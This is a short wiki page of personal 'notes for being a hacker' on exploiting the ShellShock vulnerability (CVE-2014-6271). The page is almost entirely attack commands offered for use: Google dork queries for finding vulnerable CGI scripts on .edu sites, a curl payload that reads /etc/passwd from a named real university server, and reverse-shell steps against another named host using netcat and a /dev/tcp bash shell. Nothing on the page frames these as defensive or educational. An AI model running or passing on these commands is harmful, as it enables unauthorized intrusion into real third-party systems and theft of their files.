Hacker

    版本為 09:40, 15 Nov 2024

    到這個版本。

    返回到 版本存檔.

    查閱目前版本

    A notes for being a hacker

    ShellShock (CVE-2014-6271)

    Scanning the target with Google

    inurl:cgi-bin filetype:sh site:edu
    inurl:/cgi-bin/ ext:sh 
    

    Attempt to get the username remotely

    curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
    

    Reverse SHELL

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
     

    if it response as 'Command sent to the server!', continue with the follows

    > nc -lp 4444 -vv 
    
    Waiting untill the PHP command is completed.
    If all goes well, you can issue any commands here. 
    

    Open another terminal. issue the command

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
    
    Powered by MindTouch Core